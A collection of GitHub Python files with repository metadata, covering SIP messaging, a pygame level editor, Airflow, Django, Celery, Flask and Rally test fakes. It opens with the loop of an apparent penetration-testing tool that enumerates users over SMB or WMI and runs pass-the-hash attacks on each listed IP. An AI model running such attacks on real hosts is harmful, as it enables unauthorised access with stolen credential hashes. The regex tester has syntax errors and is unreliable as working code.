if re.search('^(smb|wmi)$', args['type'], re.IGNORECASE) is None:
print 'Invalid or unspecified protocol type in --type'
exit(1)
else:
print '[*] Starting scan using '+args['type']
# Loop through each IP listed in file passed with --iplist option
for ip in ips.readlines():
ip = ip.strip('\n')
print '[*] Attempting to connect to '+args['type']+' on '+ip
# If the type was SMB, pick one of the SMB functions to use, else use WMI
if re.search('^smb$', args['type'], re.IGNORECASE):
# If the password matches the lm/nt hash format, use PtH
if re.match('[a-zA-Z0-9]{32}:[a-zA-Z0-9]{32}', args['pass']):
print '[*] Passing the hash attack on '+ip
pth(ip)
else:
smbUsers(ip)
else:
wmiUsers(ip)
# Loop through unique users dict
print '[+] Unique users for '+ip
for u in uniqUsers:
print '\t[-] User: '+u
# Reset uniqUsers dict after each IP
del uniqUsers
uniqUsers = dict() | {
"content_hash": "0129361508af4b9b1f6b6cb3955708df",
"timestamp": "",
"source": "github",
"line_count": 259,
"max_line_length": 111,
"avg_line_length": 33.75289575289575,
"alnum_prop": 0.6514527568062228,
"repo_name": "codewatchorg/p2e",
"id": "4c169f888e61edbddf48f3dd9f0264cc74b1946a",
"size": "10237",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "p2e.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [],
"symlink_target": ""
} |
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
from ...sipmessaging import SIPHeaderField
from ...sipmessaging import classproperty
class CallInfoSIPHeaderField(SIPHeaderField):
# noinspection PyNestedDecorators
@classproperty
@classmethod
def canonical_field_name(cls):
return 'Call-Info'
@classmethod
def new_for_attributes(cls, field_name="Call-Info", field_value_string=""):
return cls.new_for_field_name_and_value_string(field_name=field_name, field_value_string=field_value_string)
@property
def is_call_info(self):
return True
# http://www.iana.org/assignments/sip-parameters/sip-parameters.xhtml#sip-parameters-2
@property
def m(self):
return self.parameter_named('m')
@m.setter
def m(self, a_string):
self.parameter_named_put('m', a_string)
@property
def purpose(self):
return self.parameter_named('purpose')
@purpose.setter
def purpose(self, a_string):
self.parameter_named_put('purpose', a_string)
| {
"content_hash": "643c4630d77dbd0cea8ff2c23872a7ab",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 116,
"avg_line_length": 27.897435897435898,
"alnum_prop": 0.6893382352941176,
"repo_name": "bobjects/BobStack",
"id": "dae8e703c50b5d169e366e6c1aa2fdb49ae96848",
"size": "1088",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "bobstack/sipmessaging/concreteheaderfields/callInfoSIPHeaderField.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "59"
},
{
"name": "Perl",
"bytes": "576"
},
{
"name": "Python",
"bytes": "922808"
},
{
"name": "Shell",
"bytes": "13516"
}
],
"symlink_target": ""
} |
import pygame
from constants import SCREEN, SCREEN_WIDTH, SCREEN_HEIGHT, SHOW_FPS, MAX_FPS, CHROMA_KEY
from level import Level
from load_level import Read_File
from misc_functions import show_fps
from confirmation import Confirmation
import sound
def Save_Level(map_data, archivo):
for linea in map_data['mapa']:
archivo.write(linea)
archivo.write('\n')
archivo.write(':Fondo ' + map_data['fondo'] + '\n')
archivo.write(':Musica ' + map_data['musica'] + '\n')
archivo.write(':Pared ' + map_data['pared'] + '\n')
def Test_Level(map_data, archivo, MUTE_MUSIC):
Save_Level(map_data, archivo)
archivo.close()
#print map_data['mapa'][1]
return Level('temp', MUTE_MUSIC, 's3kfileselect', 'custom/', 'NivComp')
def Edit_Level(lvl_num, MUTE_MUSIC):
try:
lvl_name = 'custom' + str(lvl_num)
base = open('levels/custom/' + lvl_name +'.txt', 'r')
base.close()
except:
lvl_name = 'base_lvl'
templvl = open('levels/custom/temp.txt', 'w')
EXIT_MENU = False
EXIT_GAME = False
finished_level = False
x_position = []
y_position = []
for i in range(32):
x_position.append(i*32)
if i < 18:
y_position.append(i*32)
#print x_position
#print y_position
wall_image = pygame.image.load('images/tiles/wall_base.png').convert()
box_image = pygame.image.load('images/tiles/box.png').convert()
player_image = pygame.image.load('images/Isaac/stand.png').convert()
player_image.set_colorkey(CHROMA_KEY)
jump_image = pygame.image.load('images/tiles/jumpbox.png').convert()
door_image = pygame.image.load('images/tiles/door.png').convert()
door_image.set_colorkey(CHROMA_KEY)
spike_image = pygame.image.load('images/tiles/spike.png').convert()
spike_image.set_colorkey(CHROMA_KEY)
filter_image = pygame.image.load('images/tiles/boxfilter.png').convert()
filter_image.set_colorkey(CHROMA_KEY)
gravi_image = pygame.image.load('images/tiles/gravi_base.png').convert()
gravi_image.set_colorkey(CHROMA_KEY)
checkpoint_image = pygame.image.load('images/tiles/checkpoint_base.png').convert()
checkpoint_image.set_colorkey(CHROMA_KEY)
eraser_image = pygame.image.load('images/tiles/blank.png').convert()
eraser_image.set_colorkey(CHROMA_KEY)
editor_screen = pygame.Surface((1024,576))
editor_screen.fill((175,167,124))
data = {} #info del mapa
if lvl_name == 'base_lvl':
data['mapa'], data['fondo'], data['musica'], data['pared'], data['graviswitch'], data['g_spin'], data['g_spin_spd'] = Read_File('custom/base_lvl.txt')
else:
data['mapa'], data['fondo'], data['musica'], data['pared'], data['graviswitch'], data['g_spin'], data['g_spin_spd'] = Read_File('custom/'+ lvl_name + '.txt')
current_y1 = 0
for linea in data['mapa']:
current_x1 = 0
for cuadro in linea.strip('\n'):
if cuadro == 'W':
editor_screen.blit(wall_image, (current_x1*32,current_y1*32))
elif cuadro == 'P':
editor_screen.blit(player_image, (current_x1*32,current_y1*32))
elif cuadro == 'B':
editor_screen.blit(box_image, (current_x1*32,current_y1*32))
elif cuadro == 'J':
editor_screen.blit(jump_image, (current_x1*32,current_y1*32))
elif cuadro == 'S':
editor_screen.blit(spike_image, (current_x1*32,current_y1*32))
elif cuadro == 'D':
editor_screen.blit(door_image, (current_x1*32,current_y1*32))
elif cuadro == 'F':
editor_screen.blit(filter_image, (current_x1*32,current_y1*32))
elif cuadro == 'C':
editor_screen.blit(checkpoint_image, (current_x1*32,current_y1*32))
elif cuadro == 'G':
editor_screen.blit(graviswitch_image, (current_x1*32,current_y1*32))
current_x1 += 1
current_y1 +=1
pygame.display.set_mode((SCREEN_WIDTH +192, SCREEN_HEIGHT))
fondo = pygame.image.load('images/backgrounds/lvl_editor.png').convert()
current_x1 = 0#Reciclando variables
current_y1 = 0
cursor_image1 = pygame.image.load('images/gui/cursor/lvl_editor1.png').convert()
cursor_image1.set_colorkey(CHROMA_KEY)
cursor_rect1 = cursor_image1.get_rect()
x2_pos = [1035, 1099, 1037]
y2_pos = [69,133,197, 255, 312, 413,466,519]
states = [['W','B','F','G','P','B1','B2','B3'],['D','J','S','C', ' ','B1','B2','B3'], ['W','B','F','G',' ','B1','B2','B3']]
current_x2 = 0
current_y2 = 0
cursor_image2a = pygame.image.load('images/gui/cursor/lvl_editor2.png').convert()
cursor_image2a.set_colorkey(CHROMA_KEY)
cursor_image2b = pygame.image.load('images/gui/cursor/lvl_editor3.png').convert()
cursor_image2b.set_colorkey(CHROMA_KEY)
cursor_image2 = cursor_image2a
cursor_rect2 = cursor_image2.get_rect()
cursor2_state = 'W'
players_count = 1
clock = pygame.time.Clock()
while not EXIT_MENU:
cursor_pos1 = [x_position[current_x1], y_position[current_y1]] #Actualiza la posicion del cursor
cursor_pos2 = [x2_pos[current_x2], y2_pos[current_y2]]
cursor_rect1.topleft = cursor_pos1
cursor_rect2.topleft = cursor_pos2
cursor2_state = states[current_x2][current_y2]
#print cursor2_state
SCREEN.blit(fondo,(0,0))
SCREEN.blit(editor_screen,(0,0))
SCREEN.blit(cursor_image1,cursor_rect1)
SCREEN.blit(cursor_image2,cursor_rect2)
pygame.display.flip()
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_d:
sound.cursorleft.play()
if current_x1 == 31:
current_x1 = 0
else:
current_x1 += 1
elif event.key == pygame.K_a:
sound.cursorleft.play()
if current_x1 == 0:
current_x1 = 31
else:
current_x1 -= 1
elif event.key == pygame.K_w:
sound.cursorleft.play()
if current_y1 == 0:
current_y1 = 17
else:
current_y1 -= 1
elif event.key == pygame.K_s:
sound.cursorleft.play()
if current_y1 == 17:
current_y1 = 0
else:
current_y1 += 1
elif event.key == pygame.K_RIGHT:
sound.cursorright.play()
if current_x2 == 1:
current_x2 = 0
elif current_x2 == 3 or current_x2 == 2:
pass
else:
current_x2 += 1
elif event.key == pygame.K_LEFT:
sound.cursorright.play()
if current_x2 == 0:
current_x2 = 1
elif current_x2 == 3 or current_x2 == 2:
pass
else:
current_x2 -= 1
elif event.key == pygame.K_UP:
sound.cursorright.play()
if current_y2 == 0:
current_y2 = 7
current_x2 = 2
cursor_image2 = cursor_image2b
elif current_y2 == 5:
current_x2 = 0
cursor_image2 = cursor_image2a
current_y2 -=1
else:
current_y2 -= 1
elif event.key == pygame.K_DOWN:
sound.cursorright.play()
if current_y2 == 4:
current_x2 = 2
current_y2 +=1
cursor_image2 = cursor_image2b
elif current_y2 == 7:
current_y2 = 0
current_x2 = 0
cursor_image2 = cursor_image2a
else:
current_y2 += 1
elif event.key == pygame.K_RETURN:
if cursor2_state == 'B1':
if players_count == 1:
finished_level, null, null, MUTE_MUSIC, prev_song = Test_Level(data, templvl, MUTE_MUSIC)
if EXIT_MENU:
return EXIT_GAME, MUTE_MUSIC
templvl = open('levels/custom/temp.txt', 'w')
SCREEN.blit(fondo,(0,0))
pygame.display.flip()
music = pygame.mixer.music.load('sound/music/JumpingBat.wav')
prev_song = 's3kfileselect'
pygame.mixer.music.set_volume(1.0)
pygame.mixer.music.play(-1)
if MUTE_MUSIC:
pygame.mixer.music.pause()
else:
sound.no.play()
elif cursor2_state == 'B2':
if finished_level:
archivo = open('levels/custom/custom' + str(lvl_num) + '.txt', 'w')
for linea in data['mapa']:
archivo.write(linea + '\n')
archivo.write(':Fondo ' + data['fondo'] + '\n')
archivo.write(':Musica ' + data['musica'] + '\n')
archivo.write(':Pared ' + data['pared'] + '\n')
archivo.close()
sound.lvlsaved.play()
#print 'GUADADO'
else:
sound.no.play()
#print 'NOOOOO'
elif cursor2_state == 'B3' and Confirmation():
EXIT_MENU = True
#elif players_count == 1 and data['mapa'][current_y1][current_x1] == 'P':
#sound.no.play()
else:
if cursor2_state == 'W':
paste_image = wall_image
elif cursor2_state == 'B':
paste_image = box_image
elif cursor2_state == 'J':
paste_image = jump_image
elif cursor2_state == 'S':
paste_image = spike_image
elif cursor2_state == 'D':
paste_image = door_image
elif cursor2_state == 'F':
paste_image = filter_image
elif cursor2_state == 'C':
paste_image = checkpoint_image
elif cursor2_state == 'G':
paste_image = gravi_image
elif cursor2_state == 'P':
paste_image = player_image
editor_screen.blit(eraser_image, (current_x1*32,current_y1*32))
players_count += 1
elif cursor2_state == ' ':
paste_image = eraser_image
if data['mapa'][current_y1][current_x1] == 'P':
players_count -=1
editor_screen.blit(paste_image, (current_x1*32,current_y1*32))
templine = ''
temp_x = 0
for cuadro in data['mapa'][current_y1]:
if temp_x == current_x1:
templine += cursor2_state
else:
templine += cuadro
temp_x += 1
data['mapa'][current_y1] = templine
#if event.type == pygame.
#fsdfsdfsdfsdf
FPS = clock.get_fps()
if SHOW_FPS:
show_fps(FPS)
clock.tick(MAX_FPS)
pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))
return EXIT_GAME, MUTE_MUSIC
| {
"content_hash": "8c65310f71ea3906a5fcbf521eeba4d6",
"timestamp": "",
"source": "github",
"line_count": 287,
"max_line_length": 159,
"avg_line_length": 32.944250871080136,
"alnum_prop": 0.6268640930724484,
"repo_name": "AsparagusEdu/GraviSwitch",
"id": "cc208409a4b887052881576efb347675ba0d1016",
"size": "9455",
"binary": false,
"copies": "1",
"ref": "refs/heads/ReMaster",
"path": "code/level_editor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "96629"
}
],
"symlink_target": ""
} |
import logging
from airflow.contrib.hooks.bigquery_hook import BigQueryHook
from airflow.models import BaseOperator
from airflow.utils.decorators import apply_defaults
class BigQueryOperator(BaseOperator):
"""
Executes BigQuery SQL queries in a specific BigQuery database
"""
template_fields = ('bql', 'destination_dataset_table')
template_ext = ('.sql',)
ui_color = '#e4f0e8'
@apply_defaults
def __init__(self,
bql,
destination_dataset_table = False,
write_disposition='WRITE_EMPTY',
allow_large_results=False,
bigquery_conn_id='bigquery_default',
delegate_to=None,
udf_config=False,
*args,
**kwargs):
"""
Create a new BigQueryOperator.
:param bql: the sql code to be executed
:type bql: Can receive a str representing a sql statement,
a list of str (sql statements), or reference to a template file.
Template reference are recognized by str ending in '.sql'
:param destination_dataset_table: A dotted
(<project>.|<project>:)<dataset>.<table> that, if set, will store the results
of the query.
:type destination_dataset_table: string
:param bigquery_conn_id: reference to a specific BigQuery hook.
:type bigquery_conn_id: string
:param delegate_to: The account to impersonate, if any.
For this to work, the service account making the request must have domain-wide
delegation enabled.
:type delegate_to: string
:param udf_config: The User Defined Function configuration for the query.
See https://cloud.google.com/bigquery/user-defined-functions for details.
:type udf_config: list
"""
super(BigQueryOperator, self).__init__(*args, **kwargs)
self.bql = bql
self.destination_dataset_table = destination_dataset_table
self.write_disposition = write_disposition
self.allow_large_results = allow_large_results
self.bigquery_conn_id = bigquery_conn_id
self.delegate_to = delegate_to
self.udf_config = udf_config
def execute(self, context):
logging.info('Executing: %s', str(self.bql))
hook = BigQueryHook(bigquery_conn_id=self.bigquery_conn_id,
delegate_to=self.delegate_to)
conn = hook.get_conn()
cursor = conn.cursor()
cursor.run_query(self.bql, self.destination_dataset_table, self.write_disposition,
self.allow_large_results, self.udf_config)
| {
"content_hash": "446fff8ff51ce0c482fecdb7ddff5611",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 90,
"avg_line_length": 41.90625,
"alnum_prop": 0.6196868008948546,
"repo_name": "mylons/incubator-airflow",
"id": "b4e4b0e89884b582578227d0b7368806317fa5f4",
"size": "3249",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
"path": "airflow/contrib/operators/bigquery_operator.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "56963"
},
{
"name": "HTML",
"bytes": "139938"
},
{
"name": "JavaScript",
"bytes": "1370838"
},
{
"name": "Mako",
"bytes": "1037"
},
{
"name": "Python",
"bytes": "1439584"
},
{
"name": "Shell",
"bytes": "18638"
}
],
"symlink_target": ""
} |
import django.contrib.gis.db.models.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Counties',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=80)),
('state', models.IntegerField(blank=True, null=True)),
('poly', django.contrib.gis.db.models.fields.MultiPolygonField(srid=4326)),
],
options={
'verbose_name': 'US Counties',
'verbose_name_plural': 'Counties',
},
),
]
| {
"content_hash": "d3da2aaf0ddeab518459fa2589513ea7",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 114,
"avg_line_length": 29.96153846153846,
"alnum_prop": 0.55198973042362,
"repo_name": "ngageoint/geoq",
"id": "bfe6ee954dba6b6331cae9d2ee018f5edbda9625",
"size": "828",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "geoq/locations/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "167032"
},
{
"name": "Dockerfile",
"bytes": "834"
},
{
"name": "HTML",
"bytes": "311431"
},
{
"name": "JavaScript",
"bytes": "6919093"
},
{
"name": "Less",
"bytes": "16412"
},
{
"name": "Python",
"bytes": "575801"
},
{
"name": "Shell",
"bytes": "2484"
}
],
"symlink_target": ""
} |
from twilio.rest import Client
# Your Account Sid and Auth Token from twilio.com/user/account
account = "ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"
token = "your_auth_token"
client = Client(account, token)
notification = client.notify.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.notifications.create(identity="00000001", body="Hello Bob")
print(notification)
| {
"content_hash": "e2d8fa649c8b40a02131e6a36d1c8321",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 77,
"avg_line_length": 33.18181818181818,
"alnum_prop": 0.7917808219178082,
"repo_name": "teoreteetik/api-snippets",
"id": "0864b2640e7cec9aa296021f75340e857c6c0b47",
"size": "556",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "notifications/rest/notifications/send-notification/send-notification.6.x.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C#",
"bytes": "643369"
},
{
"name": "HTML",
"bytes": "335"
},
{
"name": "Java",
"bytes": "943336"
},
{
"name": "JavaScript",
"bytes": "539577"
},
{
"name": "M",
"bytes": "117"
},
{
"name": "Mathematica",
"bytes": "93"
},
{
"name": "Objective-C",
"bytes": "46198"
},
{
"name": "PHP",
"bytes": "538312"
},
{
"name": "Python",
"bytes": "467248"
},
{
"name": "Ruby",
"bytes": "470316"
},
{
"name": "Shell",
"bytes": "1564"
},
{
"name": "Swift",
"bytes": "36563"
}
],
"symlink_target": ""
} |
from celery import Celery
def make_celery(app):
celery = Celery(app.import_name, backend=app.config['CELERY_RESULT_BACKEND'],
broker=app.config['CELERY_BROKER_URL'])
celery.conf.update(app.config)
celery.config_from_object('celeryconfig')
TaskBase = celery.Task
class ContextTask(TaskBase):
abstract = True
def __call__(self, *args, **kwargs):
with app.app_context():
return TaskBase.__call__(self, *args, **kwargs)
celery.Task = ContextTask
##Celery task level events
#state = celery.events.State()
#def announce_failed_tasks(event):
# state.event(event)
# # task name is sent only with -received event, and state
# # will keep track of this for us.
# task = state.tasks.get(event['uuid'])
# print('TASK FAILED: %s[%s] %s' % (
# task.name, task.uuid, task.info(),))
#with celery.connection() as connection:
# recv = celery.events.Receiver(connection, handlers={
# 'task-failed': announce_failed_tasks,
# })
# recv.capture(limit=None, timeout=None, wakeup=True)
return celery
| {
"content_hash": "476288112c217c703962f1a6ec302c0a",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 81,
"avg_line_length": 32.611111111111114,
"alnum_prop": 0.6030664395229983,
"repo_name": "rtx3/Microburst",
"id": "9260d31da76f8c2ec70c78d874ca5648a1ea6a8c",
"size": "1198",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ray/make_celery.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1122616"
},
{
"name": "HTML",
"bytes": "325384"
},
{
"name": "JavaScript",
"bytes": "3170235"
},
{
"name": "Python",
"bytes": "142487"
}
],
"symlink_target": ""
} |
from flask import jsonify
from . import api
@api.app_errorhandler(400)
def bad_request(e):
response = jsonify({"error": "bad request"})
response.status_code = 400
return response
@api.app_errorhandler(403)
def forbidden(e):
response = jsonify({"error": "forbidden"})
response.status_code = 403
return response
@api.app_errorhandler(404)
def page_not_found(e):
response = jsonify({"error": "not found"})
response.status_code = 404
return response
@api.app_errorhandler(405)
def page_not_found(e):
response = jsonify({"error": "method not allowed"})
response.status_code = 405
return response
@api.app_errorhandler(500)
def internal_server_error(e):
response = jsonify({"error": "internal server error"})
response.status_code = 500
return response
| {
"content_hash": "527976a49c4915e9ca7440a15747f7fb",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 58,
"avg_line_length": 22.054054054054053,
"alnum_prop": 0.6850490196078431,
"repo_name": "a-rank/avaandmed",
"id": "37b1587d0597d3d74c611fbca2001d0fdc8825a4",
"size": "1391",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/api_v1/errors.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "89299"
},
{
"name": "Shell",
"bytes": "98"
}
],
"symlink_target": ""
} |
import eHive
from ReseqTrackDB import Attribute
from ReseqTrackDB import ReseqTrackDB
class StoreAttribute(eHive.BaseRunnable):
"""Store an Attribute or a list of Attributes in the DB"""
def fetch_input(self):
hostname = self.param_required('hostname')
username = self.param_required('username')
db = self.param_required('db')
port = self.param_required('port')
pwd = self.param_required('pwd')
reseqdb = ReseqTrackDB(host=hostname, user=username, port=port, pwd=pwd, db=db)
self.param('reseqdb', reseqdb)
def run(self):
attrb = self.param_required('attrb')
reseqdb = self.param('reseqdb')
attO = Attribute(attrb['table_name'], attrb['other_id'], attrb['name'], attrb['value'])
self.warning('Attribute with name: {0}'.format(attO.name))
if self.param_required('store_attributes') == 'True':
attO.store(reseqdb)
self.warning('Attribute with name: {0} was stored in DB'.format(attO.name))
def write_output(self):
self.warning('Work is done!')
| {
"content_hash": "69fefde731e214f68e9a6f7c20928157",
"timestamp": "",
"source": "github",
"line_count": 34,
"max_line_length": 95,
"avg_line_length": 32.23529411764706,
"alnum_prop": 0.6386861313868614,
"repo_name": "igsr/igsr_analysis",
"id": "e3bf64e0d3481b066488cc321b68c394521d41f1",
"size": "1096",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "PyHive/Attribute/StoreAttribute.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "3784"
},
{
"name": "Jupyter Notebook",
"bytes": "1784167"
},
{
"name": "Nextflow",
"bytes": "116144"
},
{
"name": "Perl",
"bytes": "280174"
},
{
"name": "Python",
"bytes": "532139"
},
{
"name": "R",
"bytes": "882"
}
],
"symlink_target": ""
} |
import sys
import os
import inspect
import subprocess
import time
import tempfile
import getpass
import shutil
from klab.fs.fsio import read_file, write_temp_file
class RInterface(object):
@staticmethod
def _runRScript(r_script_filename, cwd = '.', remove_output = True):
# Reset to new current working directory
tmp_dir = False
if cwd == None:
tmp_dir = True
cwd = tempfile.mkdtemp( prefix = '%s-%s-%s_' % (time.strftime("%y%m%d"), getpass.getuser(), 'plot-working-dir') )
rscriptname = write_temp_file(cwd, r_script_filename)
p = subprocess.Popen(["R", "CMD", "BATCH", rscriptname], cwd = cwd)
while True:
time.sleep(0.3)
errcode = p.poll()
if errcode != None:
break
rout = "%s.Rout" % rscriptname
os.remove(rscriptname)
rout_contents = None
if os.path.exists(rout):
rout_contents = read_file(rout)
os.remove(rout)
if errcode != 0:
print(rout_contents )
raise Exception("The R script failed with error code %d." % errcode)
if tmp_dir and remove_output:
shutil.rmtree(cwd)
return rout_contents
@staticmethod
def correlation_coefficient_gplot(inputfname, output_filename, filetype, experiment_field = "Experimental", title = ''):
'''File suffix: pearsons_r_gplot
Description: Pearson's r
Filename: ggplot_pearsons.R
Priority: 1
'''
script_path = os.path.abspath(os.path.dirname(inspect.getsourcefile(sys.modules[__name__])))
r_script_filename = read_file(os.path.join(script_path, "ggplot_pearsons.R")) % vars()
return RInterface._runRScript(r_script_filename)
def run_r_script(r_script_filename, cwd = '.'):
'''This function was adapted from the covariation benchmark.'''
p = subprocess.Popen(["R", "CMD", "BATCH", r_script_filename], cwd = cwd)
while True:
time.sleep(0.3)
errcode = p.poll()
if errcode != None:
break
rout = "{0}out".format(r_script_filename)
rout_contents = None
if os.path.exists(rout):
rout_contents = read_file(rout)
os.remove(rout)
rdata_file = os.path.join(os.path.split(r_script_filename)[0], '.RData')
if os.path.exists(rdata_file):
os.remove(rdata_file)
if errcode != 0:
print(rout_contents)
raise Exception("The R script failed with error code %d." % errcode)
return rout_contents | {
"content_hash": "5706ca2024d8bb472e501144f1a6b73c",
"timestamp": "",
"source": "github",
"line_count": 78,
"max_line_length": 125,
"avg_line_length": 32.93589743589744,
"alnum_prop": 0.6006228104320748,
"repo_name": "Kortemme-Lab/klab",
"id": "ec4aefba42d79d0fbc03fcd2a53184a5453957d1",
"size": "2569",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "klab/plot/rtools.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Perl",
"bytes": "62782"
},
{
"name": "Python",
"bytes": "2074156"
},
{
"name": "R",
"bytes": "4487"
},
{
"name": "Shell",
"bytes": "4382"
},
{
"name": "TeX",
"bytes": "2107"
}
],
"symlink_target": ""
} |
from verta._swagger.base_type import BaseType
class UacIsSelfAllowedResponse(BaseType):
def __init__(self, allowed=None):
required = {
"allowed": False,
}
self.allowed = allowed
for k, v in required.items():
if self[k] is None and v:
raise ValueError('attribute {} is required'.format(k))
@staticmethod
def from_json(d):
tmp = d.get('allowed', None)
if tmp is not None:
d['allowed'] = tmp
return UacIsSelfAllowedResponse(**d)
| {
"content_hash": "59b7245ee2f547e70ef5dc694f66761d",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 62,
"avg_line_length": 22.545454545454547,
"alnum_prop": 0.6270161290322581,
"repo_name": "mitdbg/modeldb",
"id": "04d527c6a949c635f5f6b61fd54cbabba00b8319",
"size": "539",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "client/verta/verta/_swagger/_public/uac/model/UacIsSelfAllowedResponse.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "43352"
},
{
"name": "Dockerfile",
"bytes": "235"
},
{
"name": "HTML",
"bytes": "30924"
},
{
"name": "Java",
"bytes": "393927"
},
{
"name": "JavaScript",
"bytes": "1017682"
},
{
"name": "Python",
"bytes": "178774"
},
{
"name": "Scala",
"bytes": "251259"
},
{
"name": "Shell",
"bytes": "16870"
},
{
"name": "Thrift",
"bytes": "55683"
}
],
"symlink_target": ""
} |
'''
Created on Oct 19, 2012
Script to test regex against a file containing values
to match.
@author [email protected]
'''
import re
fileImport =open('example.txt')
strFile=''
for line in fileImport
strFile += line
print(strFile)
regexValue = re.compile('Regex Here')
regexSearch = re.search(regexValue,strFile)
if(regexSearch)
print('String Found '+regexSearch.group())
else
print('Nothing Found')
if __name__ == '__main__'
pass | {
"content_hash": "d08b3dab7f496444ad3a1ff3b73340a7",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 54,
"avg_line_length": 14.303030303030303,
"alnum_prop": 0.6822033898305084,
"repo_name": "kryan762/TekDefense",
"id": "e797287e1dcff8313738138f1aba0a65d62606fb",
"size": "472",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "regexTester.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
} |
import multiprocessing
import random
import re
import string
import uuid
from ceilometerclient import exc as ceilometer_exc
from glanceclient import exc
import mock
from neutronclient.common import exceptions as neutron_exceptions
from novaclient import exceptions as nova_exceptions
import six
from swiftclient import exceptions as swift_exceptions
from rally.common import objects
from rally.common import utils as rally_utils
from rally import consts
from rally.task import context
from rally.task import scenario
def generate_uuid():
return str(uuid.uuid4())
def generate_name(prefix="", length=12, choices=string.ascii_lowercase):
"""Generate pseudo-random name.
:param prefix: str, custom prefix for genertated name
:param length: int, length of autogenerated part of result name
:param choices: str, chars that accurs in generated name
:returns: str, pseudo-random name
"""
return prefix + "".join(random.choice(choices) for i in range(length))
def generate_mac():
"""Generate pseudo-random MAC address.
:returns: str, MAC address
"""
rand_str = generate_name(choices="0123456789abcdef", length=12)
return ":".join(re.findall("..", rand_str))
def setup_dict(data, required=None, defaults=None):
"""Setup and validate dict scenario_base. on mandatory keys and default data.
This function reduces code that constructs dict objects
with specific schema (e.g. for API data).
:param data: dict, input data
:param required: list, mandatory keys to check
:param defaults: dict, default data
:returns: dict, with all keys set
:raises IndexError, ValueError: If input data is incorrect
"""
required = required or []
for i in set(required) - set(data):
raise IndexError("Missed: %s" % i)
defaults = defaults or {}
for i in set(data) - set(required) - set(defaults):
raise ValueError("Unexpected: %s" % i)
defaults.update(data)
return defaults
class FakeResource(object):
def __init__(self, manager=None, name=None, status="ACTIVE", items=None,
deployment_uuid=None, id=None):
self.name = name or generate_uuid()
self.status = status
self.manager = manager
self.uuid = generate_uuid()
self.id = id or self.uuid
self.items = items or {}
self.deployment_uuid = deployment_uuid or generate_uuid()
def __getattr__(self, name):
# NOTE(msdubov): e.g. server.delete() -> manager.delete(server)
def manager_func(*args, **kwargs):
return getattr(self.manager, name)(self, *args, **kwargs)
return manager_func
def __getitem__(self, key):
return self.items[key]
class FakeServer(FakeResource):
def suspend(self):
self.status = "SUSPENDED"
def lock(self):
setattr(self, "OS-EXT-STS:locked", True)
def unlock(self):
setattr(self, "OS-EXT-STS:locked", False)
class FakeImage(FakeResource):
def __init__(self, manager=None, id="image-id-0", min_ram=0,
size=0, min_disk=0, status="active", name=None):
super(FakeImage, self).__init__(manager, id=id, name=name)
self.min_ram = min_ram
self.size = size
self.min_disk = min_disk
self.status = status
self.update = mock.MagicMock()
class FakeStrategy(FakeResource):
pass
class FakeGoal(FakeResource):
pass
class FakeMurano(FakeResource):
pass
class FakeFloatingIP(FakeResource):
pass
class FakeFloatingIPPool(FakeResource):
pass
class FakeTenant(FakeResource):
def __init__(self, manager, name):
super(FakeTenant, self).__init__(manager, name=name)
class FakeUser(FakeResource):
pass
class FakeService(FakeResource):
pass
class FakeNetwork(FakeResource):
pass
class FakeFlavor(FakeResource):
def __init__(self, id="flavor-id-0", manager=None, ram=0, disk=0, vcpus=1,
name="flavor-name-0"):
super(FakeFlavor, self).__init__(manager, id=id)
self.ram = ram
self.disk = disk
self.vcpus = vcpus
self.name = name
class FakeKeypair(FakeResource):
pass
class FakeStack(FakeResource):
pass
class FakeDomain(FakeResource):
pass
class FakeQuotas(FakeResource):
pass
class FakeSecurityGroup(FakeResource):
def __init__(self, manager=None, rule_manager=None, id=None, name=None):
super(FakeSecurityGroup, self).__init__(manager, id=id, name=name)
self.rule_manager = rule_manager
@property
def rules(self):
return [rule for rule in self.rule_manager.list()
if rule.parent_group_id == self.id]
class FakeSecurityGroupRule(FakeResource):
def __init__(self, name, **kwargs):
super(FakeSecurityGroupRule, self).__init__(name)
if "cidr" in kwargs:
